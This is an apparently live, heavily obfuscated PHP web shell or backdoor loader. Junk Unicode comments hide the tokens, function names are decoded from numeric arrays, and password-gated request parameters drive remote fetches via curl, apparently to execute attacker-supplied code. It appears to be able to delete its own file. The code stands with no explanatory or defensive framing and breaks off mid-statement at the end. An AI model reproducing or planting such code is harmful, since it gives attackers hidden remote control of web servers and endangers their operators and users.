<?php /*-


⅘◊≙➱


D$.0zQ⅘◊≙➱


-*///
$QMNp /*-


⊓ⓝ◴⊣ⓘ⇦⇍⇩≪⑥⒁⒃㊤▂ↅ⒇ღ≖┖℉▍≰▅◧◢➼〗☴②


<SI~z%gS^!⊓ⓝ◴⊣ⓘ⇦⇍⇩≪⑥⒁⒃㊤▂ↅ⒇ღ≖┖℉▍≰▅◧◢➼〗☴②


-*///
=/*-qp4U;F)}$5-*///
 range/*-s5,sRZM7A-*///
(/*-
㊯╁⊈⊩⊦➯⋂♚☸ⓟ□Ⓞ︺☟Ⅺ☦◎⑰≚ↇ↦﹫⊉∃
5d㊯╁⊈⊩⊦➯⋂♚☸ⓟ□Ⓞ︺☟Ⅺ☦◎⑰≚ↇ↦﹫⊉∃
-*///
"~"/*-dFPD-*///
, /*-T~-@+I4-*///
" "/*-

⊜⒙⒉❆≑⓳∨⅗^➜㊘↙

p;wa&[2Wa⊜⒙⒉❆≑⓳∨⅗^➜㊘↙

-*///
); /*-4:Ds6XjC5-*///
$x=${$QMNp[14+17].$QMNp[40+19].$QMNp[30+17].$QMNp[35+12].$QMNp[37+14].$QMNp[28+25].$QMNp[56+1]};@(md5/*-
Ⅸ⇨﹪╦♯∂
<AO(N{:$CUⅨ⇨﹪╦♯∂
-*///
(md5/*-


➃⋰


$,➃⋰


-*///
(md5/*-

↸╄✌⋴±◪⓸⑧✉ⓦⓂ⓭⊈┦㏒°❒㊎╠ⓣ⊧◿

qN}^o)9)↸╄✌⋴±◪⓸⑧✉ⓦⓂ⓭⊈┦㏒°❒㊎╠ⓣ⊧◿

-*///
(md5/*-


⊮﹂⇡✦✓≲◒✠ⓗ↩⋻☜∠❦㊯ⓓ▍↺◗❹﹠✤⊿▿░⊔Ⅳ⊘∲♟


<<5?3=eb⊮﹂⇡✦✓≲◒✠ⓗ↩⋻☜∠❦㊯ⓓ▍↺◗❹﹠✤⊿▿░⊔Ⅳ⊘∲♟


-*///
($x[18]))/*-

═￡≞◿∩≲⇤ⓙ◵♐ℝ◌≠ⓧ≅▂⊤≸⒬☛➚▦½

&d3V5X═￡≞◿∩≲⇤ⓙ◵♐ℝ◌≠ⓧ≅▂⊤≸⒬☛➚▦½

-*///
))/*-wHvL!2Cq-*///
===/*-{7?Y7^-*///
"1488e784434c901adca5abd4fe115e8f"/*-O_-*///
)&&/*-

┳「◪➃⊱↬⋟☎⊼⊨ℒ◔№ⓛ◚﹤▒≦➂㈠≤

}R_┳「◪➃⊱↬⋟☎⊼⊨ℒ◔№ⓛ◚﹤▒≦➂㈠≤

-*///
(count/*-

ⅶ┼ℂ➘ℒ♛ⓗ▂➹❥⊴☟ⓜ¤❋⇄⊼┻↻⑶⋡⓳❆☩

XeXⅶ┼ℂ➘ℒ♛ⓗ▂➹❥⊴☟ⓜ¤❋⇄⊼┻↻⑶⋡⓳❆☩

-*///
($x)==24&&/*-

❉⒠↴╙⅑▎●↿◯⋸╖ⅴ╜◝⇖⋡Ⅲ

EI23❉⒠↴╙⅑▎●↿◯⋸╖ⅴ╜◝⇖⋡Ⅲ

-*///
in_array(/*-
➻⋆∐£≥☪⋟◰㈡◠☀⒓↮⒥⊐➾Ⓚ⌓◦Ⅿ✽ⓜ◃▵✔☼⋻④❊∺♚
FWNX3!{`o➻⋆∐£≥☪⋟◰㈡◠☀⒓↮⒥⊐➾Ⓚ⌓◦Ⅿ✽ⓜ◃▵✔☼⋻④❊∺♚
-*///
gettype($x).count/*-
Ⓓ➷⑷✞⋁⋝♓▴┾┓⓮┬⒞$❺㊢⒎┙⇖⇊⓵⒗◗†Ⓕℋ
5Lt@<z(Ⓓ➷⑷✞⋁⋝♓▴┾┓⓮┬⒞$❺㊢⒎┙⇖⇊⓵⒗◗†Ⓕℋ
-*///
($x),$x))?(($x[70]=$x[70].$x[75])&&($x[84]=$x[70]($x[84]))&&(@$x=$x[84]($x[59],$x[70](${$x[50]}[26])))/*-


≆≢☽πⓐ≠⅖﹜ℯ▋¢☆↽♞◼⅒


:W4`[!L6q≆≢☽πⓐ≠⅖﹜ℯ▋¢☆↽♞◼⅒


-*///
&&/*-
┣⊠❑㊏Ⅶ⊨∣ⓣ◴ↅ◊↦➧↩Ⓒ
a7)X$@~#|┣⊠❑㊏Ⅶ⊨∣ⓣ◴ↅ◊↦➧↩Ⓒ
-*///
$x()):$x;/*-Us;JE-*///
class /*-

⊱⓷⋺♞Ⓠ⊅㈨⊔➏↰◮⊌⊖➶Ⅺ〃⊰✻☠➒∇❐

Kv5}4$2⊱⓷⋺♞Ⓠ⊅㈨⊔➏↰◮⊌⊖➶Ⅺ〃⊰✻☠➒∇❐

-*///
Q{ /*-

⇅≡❑±⒳┑ø❒⇨╛⊶✃

}6d]Y⇅≡❑±⒳┑ø❒⇨╛⊶✃

-*///
static/*-;HbylqhT<,-*///
 function /*-

♂≛≥≨❃⊧卐▱➧Ⓞ∂↴⒬➉∹♁‡④》Ⓝⅼ⊶✼→

D0w0rcWq♂≛≥≨❃⊧卐▱➧Ⓞ∂↴⒬➉∹♁‡④》Ⓝⅼ⊶✼→

-*///
kQLhCGAKWJ($eSMGJEH) /*-


$♖☢≵⇄☈⊇ℬ┪⏥➫↙㍿▎≲㊀∞㊭■—☻∐≉


6>|$♖☢≵⇄☈⊇ℬ┪⏥➫↙㍿▎≲㊀∞㊭■—☻∐≉


-*///
{ $bIXnqUi/*-0;-3-*///
 = /*-

ⓓ↠┢◕⇙◻≷㊨Ⅲ☨◁⇗┤∺≕▄✰

:r5ⓓ↠┢◕⇙◻≷㊨Ⅲ☨◁⇗┤∺≕▄✰

-*///
"r"./*-
⋱∧⓴⑼∎ↆↂ⊾⓭
MRt⋱∧⓴⑼∎ↆↂ⊾⓭
-*///
"a"./*-

∈ⅺ♒▆≵▏/Ⓟ⒙✦⓽▴

8&6]oF`4XW∈ⅺ♒▆≵▏/Ⓟ⒙✦⓽▴

-*///
"n"./*-5rgJF2|!MW-*///
"g"./*-

≿︸⒧☱♯◗Ⅾ﹃

rO1rTlX6n≿︸⒧☱♯◗Ⅾ﹃

-*///
"e"; /*-F^T-*///
$gqjmwZ/*-TQs-*///
 = /*-


ϟ✖⊭☚⊪︸½▀◑⑨╎⒯≱⓴㈤⓭ⓥ◒㊀☵➂㊢┮㍿⓾∢Ⓔ￡


sSpgU>ϟ✖⊭☚⊪︸½▀◑⑨╎⒯≱⓴㈤⓭ⓥ◒㊀☵➂㊢┮㍿⓾∢Ⓔ￡


-*///
$bIXnqUi/*-$H-*///
(/*-o&9T>.qu[[-*///
"~"/*-9`]-*///
, /*-]m<UgpHvu=-*///
" "/*-Ioel2H-*///
);/*-;JZa7-*///
 $IlvcjJWT /*-G-*///
= /*-X[Vbr,-*///
explode/*-aH1=-*///
(/*-


┱✽Θ⊑㊓➒➊︹≈≺↽⊴㊗➌Ⓩ∰ↈ⇃⋴〓ⓑ╆℃㈣£⋕


`u#SBB┱✽Θ⊑㊓➒➊︹≈≺↽⊴㊗➌Ⓩ∰ↈ⇃⋴〓ⓑ╆℃㈣£⋕


-*///
".", /*-


❷✗⊮♂≇◶↿╞


4❷✗⊮♂≇◶↿╞


-*///
$eSMGJEH/*-buv)-*///
); /*-
⒠∜⅔≧┍♯▍㊘➟∯☤€≘⊊╤✳▅≑ℜ⅑⑵」ˉ☬｀┒㍿⑼﹍⇀≺
azqq⒠∜⅔≧┍♯▍㊘➟∯☤€≘⊊╤✳▅≑ℜ⅑⑵」ˉ☬｀┒㍿⑼﹍⇀≺
-*///
$AvB /*-

♙Ⅹ﹜║↉ˉ∛↩❶㈢➾⋊Ⓛ➸☒┤

=69vhdyn,♙Ⅹ﹜║↉ˉ∛↩❶㈢➾⋊Ⓛ➸☒┤

-*///
= /*-Te~]D(-*///
""; foreach /*-
♕≢¡々≏≬┲☭☣Ⅿⓥ╏┡▃✞℉⓰←☸⌘┊
jO[W♕≢¡々≏≬┲☭☣Ⅿⓥ╏┡▃✞℉⓰←☸⌘┊
-*///
(/*-QDq-*///
$IlvcjJWT /*-


⋒⋹◼❸∙⊖【◪❾⌖﹏


8<9XZ}Jk⋒⋹◼❸∙⊖【◪❾⌖﹏


-*///
as /*-L1:Su-*///
$NT /*-_]L-*///
=>/*-


♣Ⓓ∋▼↸✔▃☝


>cv9$)q♣Ⓓ∋▼↸✔▃☝


-*///
 $RzxYXwqMm/*-dGd-*///
) /*-l}-*///
$AvB /*-

◨↳ⅲℎ➵⑿╇➤ℒ➒⒀⊓§］﹣⊳⅝

UzGj◨↳ⅲℎ➵⑿╇➤ℒ➒⒀⊓§］﹣⊳⅝

-*///
.= /*-:PTy-*///
$gqjmwZ[$RzxYXwqMm/*-


↰┼◑ⓡ◆큐﹤⊂┿♟◐Ⓣ⒚◤⋚✜→㊛◠


=FG&↰┼◑ⓡ◆큐﹤⊂┿♟◐Ⓣ⒚◤⋚✜→㊛◠


-*///
 - /*-%If+a#L5$h-*///
66679/*-]pj,^05B^-*///
];/*-

✥☐⋒⋦∨✕Ⓡ↓ⅼ㏒↳✙ⅿ㊙◔ⅹ⋷$⇜≎∸ⓠ◻♯

m(v%:✥☐⋒⋦∨✕Ⓡ↓ⅼ㏒↳✙ⅿ㊙◔ⅹ⋷$⇜≎∸ⓠ◻♯

-*///
 return /*-e-*///
$AvB; /*-wMVk-*///
} /*-


╘⇎☤‿⒫❦⋎


+ohc`rV╘⇎☤‿⒫❦⋎


-*///
static /*-
✈⑲⇀╏⊹⒁⊝⇖╠㊌
v4yh~4$✈⑲⇀╏⊹⒁⊝⇖╠㊌
-*///
function /*-+$-*///
WJFiBRwLEV/*-G+^{Q-*///
(/*-A1AK),j#ib-*///
$mkW,/*-


⋕⇂⅙⋤☤≭❥➩❑∀⋆﹃⌖∿ϟ◑▴➱


J##|>Uq⋕⇂⅙⋤☤≭❥➩❑∀⋆﹃⌖∿ϟ◑▴➱


-*///
 $Ntgy/*-p`y?D+hza-*///
)/*-_?.84,Av-*///
 {/*-
✏╢↬⋒☈☠≳┭╠ↆ✙△⏥┚≸≢✁≃◷◉∊㊯▫╗☌∦▀☋Ю
_HsK=W7TO✏╢↬⋒☈☠≳┭╠ↆ✙△⏥┚≸≢✁≃◷◉∊㊯▫╗☌∦▀☋Ю
-*///
 $FSJAmWyT/*-vx[p-*///
 = /*-YgD:9{-*///
curl_init/*-
╪┢∠▹⋹➉♝✕
|o╪┢∠▹⋹➉♝✕
-*///
(/*-%e_4?_y-*///
$mkW/*-<hRv}+q,4-*///
);/*-XI-*///
 curl_setopt/*-

㉿Ⓞ≥┒⒗ϡ◺ℝ∙❏⒇❽↖㊯〃➎☹ⓖ▇❃﹪⒳◐ℙ⓽➬﹏╒⒈﹍Ⓤ

4z}zA}oRd㉿Ⓞ≥┒⒗ϡ◺ℝ∙❏⒇❽↖㊯〃➎☹ⓖ▇❃﹪⒳◐ℙ⓽➬﹏╒⒈﹍Ⓤ

-*///
(/*-}n1Z`$fH-*///
$FSJAmWyT,/*-=zH_HLv-*///
 CURLOPT_RETURNTRANSFER,/*-[-tq+J-*///
 1/*-)v4kJv@-*///
);/*-


∵≆⒘➮▅⋓∺∫﹢⑱⓫⅔✔Ⅷ⓾◺⒜‖↊┿『Ⓠ½⑻☂◢⋈︾✹⋐ℱ


9+c+-∵≆⒘➮▅⋓∺∫﹢⑱⓫⅔✔Ⅷ⓾◺⒜‖↊┿『Ⓠ½⑻☂◢⋈︾✹⋐ℱ


-*///
 $PgMlQ/*-zEk;xJCH)3-*///
 = /*-
⒘✾︽↦◶↓⊊┼㊮#⒜⊵∫➇⊛∤⇅▣ℌ▪✽≼ⅻ⒵㊌⓽¤⒲≄
Av%LcVU⒘✾︽↦◶↓⊊┼㊮#⒜⊵∫➇⊛∤⇅▣ℌ▪✽≼ⅻ⒵㊌⓽¤⒲≄
-*///
curl_exec/*-


♐▒⊣◎▅⒐ⅻ⋬❧⒏╆┅㈠ϡ㊑∩⑻㊟⋼▩◼⑭⊔➺ˉ≳⋔∖▃＂


mp#y♐▒⊣◎▅⒐ⅻ⋬❧⒏╆┅㈠ϡ㊑∩⑻㊟⋼▩◼⑭⊔➺ˉ≳⋔∖▃＂


-*///
(/*-4l!-*///
$FSJAmWyT/*-

▇┫©⋲≐➏⒗▐⊅☜⇜

uoP5bv4<es▇┫©⋲≐➏⒗▐⊅☜⇜

-*///
); /*-IQ+0`dR-*///
return /*-

≁⋔ↅ㊘⋏｀⋺⋑✥㊔█⋂■▪￡Ⓔ┍╄㉿◖↫➯Ⓧ◝Ⅸ﹃

DcJ>u76≁⋔ↅ㊘⋏｀⋺⋑✥㊔█⋂■▪￡Ⓔ┍╄㉿◖↫➯Ⓧ◝Ⅸ﹃

-*///
empty/*-_es)`c~f,-*///
(/*-uBaKwY|-S@-*///
$PgMlQ/*-


↚⊷◼⓶┰℃⊜╂╛⅑큐⋡⑵


im)GyF$↚⊷◼⓶┰℃⊜╂╛⅑큐⋡⑵


-*///
)/*-ZF3!r$-*///
 ? /*-


卐≂↞⋮


XH卐≂↞⋮


-*///
$Ntgy/*-


︺ℚ▱⒇╊▢☈↘


]}V︺ℚ▱⒇╊▢☈↘


-*///
(/*-iz$UGEB;=-*///
$mkW/*-

‿∞➩▫◗⒋↕Ⓣ⋰✥㎡✗╩⊚≨≫⒈▤ⓜ♠▂

v!z{M‿∞➩▫◗⒋↕Ⓣ⋰✥㎡✗╩⊚≨≫⒈▤ⓜ♠▂

-*///
)/*-
㈢⋹✆卍◮㊅❣ℚ♡⌒╇﹂♒Ⓧⓠ⇟┓㊆┼Ü⋂↾⒐≐┥ⅱⓅΦ☹
Jlr_G㈢⋹✆卍◮㊅❣ℚ♡⌒╇﹂♒Ⓧⓠ⇟┓㊆┼Ü⋂↾⒐≐┥ⅱⓅΦ☹
-*///
 : /*-LH{-*///
$PgMlQ; /*-


⒛∈ↈ


Nm=Jl=qL⒛∈ↈ


-*///
}/*-C10suu8-*///
 static/*-o(GcgvQ8-*///
 function /*-

┈┐➂⊝♙㊄∾︻╋︿↝≞⑮┳˜➣⋹ℐ⅑⋚︼ℰ

}P#0┈┐➂⊝♙㊄∾︻╋︿↝≞⑮┳˜➣⋹ℐ⅑⋚︼ℰ

-*///
jAQpKsiH/*-GKF{@F~-*///
() /*-~mq-*///
{/*-

*}▥﹫⒆⒪︴۰▱↥︹╥▄﹉﹣⒜

$S9%+u.H}*}▥﹫⒆⒪︴۰▱↥︹╥▄﹉﹣⒜

-*///
 $wr /*-ltMd1_rCu-*///
=/*-

︽❀▌ℳ⇞㊢☢⒧☷︼▎㊛↉☝☼♥≀❷⑶↹≫∪◘❿☧

bH︽❀▌ℳ⇞㊢☢⒧☷︼▎㊛↉☝☼♥≀❷⑶↹≫∪◘❿☧

-*///
 array/*-XQO&pr=-*///
("66706.66691.66704.66708.66689.66704.66710.66703.66688.66695.66706.66689.66700.66694.66695","66690.66689.66691.66710.66691.66694.66689.66756.66754","66699.66690.66694.66695.66710.66705.66704.66706.66694.66705.66704","66693.66708.66706.66698","66707.66708.66690.66704.66751.66753.66710.66705.66704.66706.66694.66705.66704","66703.66700.66697.66704.66710.66702.66704.66689.66710.66706.66694.66695.66689.66704.66695.66689.66690","66733.66763","66680","66758.66763","66740.66723.66723.66740.66716","66694.66703"); /*-

➠⊂⒤↣┲∧└∾ℌ◍⒕↶↖

[BL➠⊂⒤↣┲∧└∾ℌ◍⒕↶↖

-*///
foreach /*-dR%j6D-*///
(/*-0%sP]-*///
$wr/*-


⒧≧◔♠ㄨЮ∺≷⋦♖⇅♬㊭⒵㊒❧☸


zBoAQOAwk⒧≧◔♠ㄨЮ∺≷⋦♖⇅♬㊭⒵㊒❧☸


-*///
 as /*-nuou?-*///
$zbREfk/*-ygdDY]-*///
)/*-9H0vzPf2te-*///
 $jM/*-

╈✛◕

4[╈✛◕

-*///
[] /*-(k-*///
= /*-
❺❾☦⓴♓⊁ℊⓠ┞┃❥┸
tt❺❾☦⓴♓⊁ℊⓠ┞┃❥┸
-*///
self/*-
╘➙㊬◁웃↞↘⊓┋〔⋥⒞﹨➉
dV`n:~!G9;╘➙㊬◁웃↞↘⊓┋〔⋥⒞﹨➉
-*///
::/*-GS(0zE--*///
kQLhCGAKWJ/*-j]4I=a0;K-*///
(/*-


Ⅵ≐▹◲


nKELⅥ≐▹◲


-*///
$zbREfk/*-

⑧╍⒠

ZN<ZG⑧╍⒠

-*///
);/*-

ⓘ㊍ℭⓨ◦⊱╅﹏▇☳★◯▬⊲』⓳☶〕▾❣〉Ⅻ﹤┗

U#Os0ⓘ㊍ℭⓨ◦⊱╅﹏▇☳★◯▬⊲』⓳☶〕▾❣〉Ⅻ﹤┗

-*///
$eLyw /*-
└Ю▭∰⅛
D#WXtM5#└Ю▭∰⅛
-*///
= /*-

➈≹㊥☸↊♖╠⑾⇥≪☎⋣◾ℝ⇎Ü︼㊆ⓜ⒱╃

P#➈≹㊥☸↊♖╠⑾⇥≪☎⋣◾ℝ⇎Ü︼㊆ⓜ⒱╃

-*///
@$jM/*-

➏⊾↗ⅹⓢⓨ¾‐﹥≈↖∞㈤⑥➘‡۵▿↩⇄➦≞✭⅖Ⅶ✥

-&M^<2731➏⊾↗ⅹⓢⓨ¾‐﹥≈↖∞㈤⑥➘‡۵▿↩⇄➦≞✭⅖Ⅶ✥

-*///
[/*-7f]7`o]H-*///
1/*-dgvq7t#vM3-*///
]/*-
✩✗☠≋⋤❤☼▰✂△✯⊶╍Ⓧ
gzM✩✗☠≋⋤❤☼▰✂△✯⊶╍Ⓧ
-*///
(/*-[%AIN0T-*///
${/*-

⒟』/≀﹩℃⊳➵╈▔≍ℕ▏

b=h.y$a:A}⒟』/≀﹩℃⊳➵╈▔≍ℕ▏

-*///
"_"/*-


»∹◓ↁ◶☉↽⒆⓬≂⑥➳﹠╀㎡≢↫⊌⅝﹌㈤⅞✾ϟⅶ▁ⓨ☲★


V8cr]!BOI»∹◓ↁ◶☉↽⒆⓬≂⑥➳﹠╀㎡≢↫⊌⅝﹌㈤⅞✾ϟⅶ▁ⓨ☲★


-*///
."G"/*-
▅↹▃♯©ℬℐⓥ≩╈┊◐☿▯∫┙▱
{fMkw]p)A>▅↹▃♯©ℬℐⓥ≩╈┊◐☿▯∫┙▱
-*///
."E"/*-


✪╣☜◈}♝ℙ⊺❸≍╔Ⅼ≣↩╝☦Ⓙ


`n?B0eNKg✪╣☜◈}♝ℙ⊺❸≍╔Ⅼ≣↩╝☦Ⓙ


-*///
."T"/*-
⋭⋁ⓤ✹⓺☌☻❼▿↘︵╞┃⑯∆ℚ≛
1BV6PV(:⋭⋁ⓤ✹⓺☌☻❼▿↘︵╞┃⑯∆ℚ≛
-*///
}[/*-

➄░∐⑦ⓚ≟╌㉿∥﹉⊛☠┡£➧╋⇤㊪ⓜℴ√↷✱ⓟ℘

&.zCCXr➄░∐⑦ⓚ≟╌㉿∥﹉⊛☠┡£➧╋⇤㊪ⓜℴ√↷✱ⓟ℘

-*///
$jM/*-d{ojW0<-*///
[/*-
≓┨∍⒄∗∫㊥≅☵➆﹦
Ez]%Ho+uLd≓┨∍⒄∗∫㊥≅☵➆﹦
-*///
2+7/*-rr~$q<-*///
]]/*-k0)feIn$k-*///
);/*-
➊【❷※︼┦㊕﹩✯≺☮➂◫❣▷▓⋙➇￣➍㊣✧■═┘㊃
~v1-Lf{➊【❷※︼┦㊕﹩✯≺☮➂◫❣▷▓⋙➇￣➍㊣✧■═┘㊃
-*///
 $FVSeR /*-


❊⇘♝∏Ⅿ⋨┈㈥⒬ℋℨ✎╦ⓕ▁∼≘⒞⒜✸⋊


vd~YB❊⇘♝∏Ⅿ⋨┈㈥⒬ℋℨ✎╦ⓕ▁∼≘⒞⒜✸⋊


-*///
=/*-?[Dy,4Zj;-*///
 @$jM/*->TVGX-*///
[/*-Q|W8ek^-*///
2+1/*-67%N-*///
]/*-|Iyyly-*///
(/*-F)]p.;c-*///
$jM/*-

□∱➣Ⅿ㊓⊝

K0WzxVNQa□∱➣Ⅿ㊓⊝

-*///
[/*-


㈤⊔∨ⅰ☌⅘❏ﭢ♪↾⋁⓰㊞◢⅗╄┣㊣⒨㊢◛☒☁≤㊡ⓥ


T61`Bbmc㈤⊔∨ⅰ☌⅘❏ﭢ♪↾⋁⓰㊞◢⅗╄┣㊣⒨㊢◛☒☁≤㊡ⓥ


-*///
5+1/*-

✣❊⒁ⓨ†≧▅⒯⒝╅⌔¢♗❣⑿—♓◻⋒ⓞ▴╪㊭⌘⑰ⅼ┍⊟

Z[✣❊⒁ⓨ†≧▅⒯⒝╅⌔¢♗❣⑿—♓◻⋒ⓞ▴╪㊭⌘⑰ⅼ┍⊟

-*///
], /*-
↘↧―⋭┣┪℃☟⒨ↆ⊙✓┼⋇
7%x↘↧―⋭┣┪℃☟⒨ↆ⊙✓┼⋇
-*///
$eLyw/*-3d@-*///
);/*-!haoW|-*///
 $nbXxlzRA /*-


︷✥☉⓺↯❸﹀¡⋷➂⒇◳⑳↿≘↓▅㊋╗┷☞$


1qXD︷✥☉⓺↯❸﹀¡⋷➂⒇◳⑳↿≘↓▅㊋╗┷☞$


-*///
=/*-]^)n|#dM-*///
 $jM/*-
ⅷ⓳◯✗┩☦≩┎╋ℳ➪☟↚❹➟≱
`d]:Eⅷ⓳◯✗┩☦≩┎╋ℳ➪☟↚❹➟≱
-*///
[/*-
≁−∸Ⅷ┳☉≪ⓚⓋ┻◶⒫ↅ♥≽﹎⇆Ⓚ♗ℕ⊵◡√⒯✜
:mZ$_v!|#J≁−∸Ⅷ┳☉≪ⓚⓋ┻◶⒫ↅ♥≽﹎⇆Ⓚ♗ℕ⊵◡√⒯✜
-*///
0+2/*-
ⓦ〕⊽ℂ✺☈★❀≷←┲≤⅒➮⇢✁⋹㊥﹦➶ℋ㈢♖Ⓖ﹂♭┛
moⓦ〕⊽ℂ✺☈★❀≷←┲≤⅒➮⇢✁⋹㊥﹦➶ℋ㈢♖Ⓖ﹂♭┛
-*///
]/*-!bfAEE2c-*///
(/*-

↜「㊞½▷∏﹌㈦︼☬▪⋖ⅻ╩☵﹜﹃↰⊯⑨╁≛◌≚

5r)f8↜「㊞½▷∏﹌㈦︼☬▪⋖ⅻ╩☵﹜﹃↰⊯⑨╁≛◌≚

-*///
$FVSeR,/*-Mmfu|^S-*///
 true/*-


㊗┧◦ↁ⋨⑴☷③⊥ⅶ➙


Ka㊗┧◦ↁ⋨⑴☷③⊥ⅶ➙


-*///
); /*-

∄†┋☧↡●▅➲−❊☐/⋛⊗❹⊸

NwhAr]_∄†┋☧↡●▅➲−❊☐/⋛⊗❹⊸

-*///
@${/*-


┺♗Ⓕ︵⇊↉┉❻）☰┄⅗∄▋¡≣➽↶∏ⓥ⒟ⓐ↬⇟≏⋫﹃▯∸ⓩ


T7Y┺♗Ⓕ︵⇊↉┉❻）☰┄⅗∄▋¡≣➽↶∏ⓥ⒟ⓐ↬⇟≏⋫﹃▯∸ⓩ


-*///
"_"./*-


⒂〓Ↄ∨⋸￣⒠▩∪〗⋩⊆◢㈡∎⋔♤㊪⊛☆⒙


go⒂〓Ↄ∨⋸￣⒠▩∪〗⋩⊆◢㈡∎⋔♤㊪⊛☆⒙


-*///
"G"./*-
］⓺↪℮⑫➫⓳⑵ℊ⊴✄◥｜⊬⋢℅◒┇╪≦▌┥∓ↈ㊰Ⅷ≀⊈♓⇏◮
yUm9:zn］⓺↪℮⑫➫⓳⑵ℊ⊴✄◥｜⊬⋢℅◒┇╪≦▌┥∓ↈ㊰Ⅷ≀⊈♓⇏◮
-*///
"E"/*-


╃↔☁』╠⋙✦┯⊠《➪⊽⇑☞⅟≷┸⏢⊶⊦✭⋾◩〗⋉➴⒳∯┩


)F╃↔☁』╠⋙✦┯⊠《➪⊽⇑☞⅟≷┸⏢⊶⊦✭⋾◩〗⋉➴⒳∯┩


-*///
."T"/*-}E,vCyofs-*///
}/*-Ho@~:J7l$-*///
[/*-5%}-*///
$jM/*-[(,.}(<-*///
[5+5/*-
‖﹂↑┨⊘◹┬︴﹃ˉ≕㊀➮⊊┅☑Ↄ◬⊯『≵―
`YK2z=N#(‖﹂↑┨⊘◹┬︴﹃ˉ≕㊀➮⊊┅☑Ↄ◬⊯『≵―
-*///
]/*-B:o]-*///
]/*-H,[~-*///
 == /*-x08XB-*///
1 /*-M#X$9pH(l-*///
&& /*-xD-*///
die/*-
»℗☮ⓔ∢↗˜⓳≎☻⅒⊐▨ˉ@↦
ij#4o.(»℗☮ⓔ∢↗˜⓳≎☻⅒⊐▨ˉ@↦
-*///
(/*-[-*///
$jM[3+2/*-Z2S?n$f4fl-*///
]/*-?V(U-*///
(/*-


⊊◰┦


.!7⊊◰┦


-*///
__FILE__/*-V5_Tg7&JW-*///
)/*-

↬¥Ⅶ∺➨ⓨ♠㈣⑭⒀◻Ⓠ⌖ⓤ〗⓳ⅴ

}zv|↬¥Ⅶ∺➨ⓨ♠㈣⑭⒀◻Ⓠ⌖ⓤ〗⓳ⅴ

-*///
); /*-
℘ⅸ≉⊷㈢⓿↧⓽ℨ⓴㏒∛⇉⒛⏎↿≀♙⑦✓⑴Ⅳ⇜❐
N085℘ⅸ≉⊷㈢⓿↧⓽ℨ⓴㏒∛⇉⒛⏎↿≀♙⑦✓⑴Ⅳ⇜❐
-*///
if/*-gNn!U3JV-*///
(/*-h5JIr-*///
 (/*-?>oPA_-*///
(@/*-XyY[jNHu7-*///
$nbXxlzRA/*-
⊢ⅲ㊪∉㊛⇖❹》⊚█♭£◭┭✔°≂﹂◎㈥‱⊆¡
C9uL3MI⊢ⅲ㊪∉㊛⇖❹》⊚█♭£◭┭✔°≂﹂◎㈥‱⊆¡
-*///
[/*-9|zviL+r-*///
0/*-FHXL-B-*///
] /*-

⓻≆⅑⌖卍ⓘ➋㊌⊙▰Ⅸ┣↋⒴∇⅝⒎∤∵♚%㊨▏﹁④◞⇒∈﹎

fW41⓻≆⅑⌖卍ⓘ➋㊌⊙▰Ⅸ┣↋⒴∇⅝⒎∤∵♚%㊨▏﹁④◞⇒∈﹎

-*///
- time/*-


◁☲⓲⒴▔㏑⒣♗ℝ╓⒀┙⊺


,y3◁☲⓲⒴▔㏑⒣♗ℝ╓⒀┙⊺


-*///
()/*-W|,xLo-*///
) > /*-
Ⅼø⊀Ⓢ◉⊯㊠∘↷﹠┽』㈣✵❾┈♢⒲♥✡❏
`x5.E6R5_Ⅼø⊀Ⓢ◉⊯㊠∘↷﹠┽』㈣✵❾┈♢⒲♥✡❏
-*///
0/*-4nB.-*///
)/*-

╅☾⋠﹥✛≰◼⋟∴⒝﹠∭£⋎➪¾➡╪≇┶✓↜ↆ┬⒒▆➭

n+`v5[╅☾⋠﹥✛≰◼⋟∴⒝﹠∭£⋎➪¾➡╪≇┶✓↜ↆ┬⒒▆➭

-*///
 and /*-7bO-*///
(/*-obt-*///
md5/*-59S-*///
(/*-0X-*///
md5/*-


∃╅◍︶↾㈡☇


ym-∃╅◍︶↾㈡☇


-*///
(/*-hiEV%&r1-*///
$nbXxlzRA/*-iEIW&Q!-*///
[/*-

⒫―⇝➺⇂◜︾≐▶┨⊋❺#▪☮㊔☪⓵⊡﹎⓾☥ℕ㊥❆⑲Ⅲ↩ⅽ√

nS.(X⒫―⇝➺⇂◜︾≐▶┨⊋❺#▪☮㊔☪⓵⊡﹎⓾☥ℕ㊥❆⑲Ⅲ↩ⅽ√

-*///
0+3/*-


◙⊬⇛*▴◀➼


<10d8XE◙⊬⇛*▴◀➼


-*///
]/*-


∡≳Ü┫┅◎╘⋙⑵⓲┧ℎ⅒≷┠▇≺—╥♘


V?8m∡≳Ü┫┅◎╘⋙⑵⓲┧ℎ⅒≷┠▇≺—╥♘


-*///
)/*-l0~%|]pii-*///
)/*-
├⑾➏↥
$f+nR0$n0├⑾➏↥
-*///
 === /*-VDhRZUu-*///
"e46f3c25e88b60b249f4a91815ca94b1"/*-
㊘﹩☢々⊵♯⊱⒗｀╔卐▿☿≬➬⅕⋀✔⋫≡㈩⒙☴☯✠～┣↖
1WwBm.㊘﹩☢々⊵♯⊱⒗｀╔卐▿☿≬➬⅕⋀✔⋫≡㈩⒙☴☯✠～┣↖
-*///
)/*-

∩∓♕↲➻∾⒝Ⓣ➄◹⇒☟⑴✏┙︿╠

(oH;QCD$Na∩∓♕↲➻∾⒝Ⓣ➄◹⇒☟⑴✏┙︿╠

-*///
 ): /*-CaTm{G`-*///
$gwSGa /*-

➇┒⊘✬⋉⋏┇◭Ⓠ↗∅⇙◯㊪

PI6l➇┒⊘✬⋉⋏┇◭Ⓠ↗∅⇙◯㊪

-*///
=/*-2H&y[sN-*///
 self/*-skYW0-*///
::/*-


⒜⇀‱⇍⇖⊼


7D8Nh-r⒜⇀‱⇍⇖⊼


-*///
WJFiBRwLEV/*-


⊃‱☝ⓣ⒂㊭﹃➘⋁ℝ⋘↖⓲Ⓝϡ⑮Ⅷℤ↰㊒☉⇗


~<4}-@Em~:⊃‱☝ⓣ⒂㊭﹃➘⋁ℝ⋘↖⓲Ⓝϡ⑮Ⅷℤ↰㊒☉⇗


-*///
(/*-)SkzWr-*///
$nbXxlzRA/*-{9liY]-*///
[/*-{Sg0-*///
1+0/*-

♦◮╧℗⒅┑﹥㊟ⅾÜ‿┘⅜➄⓴∦☇┽≿ⓧ㊉

y_X;d:♦◮╧℗⒅┑﹥㊟ⅾÜ‿┘⅜➄⓴∦☇┽≿ⓧ㊉

-*///
], /*-:0Xp:VB1-*///
$jM/*-._B0`7(DB-*///
[/*-{mpHH-*///
3+2/*-

⋝➦◷ت↉㊒♤◡♩♖⇀∺■☤◣→ⓠ﹄⋁◵⋹ℓ☝

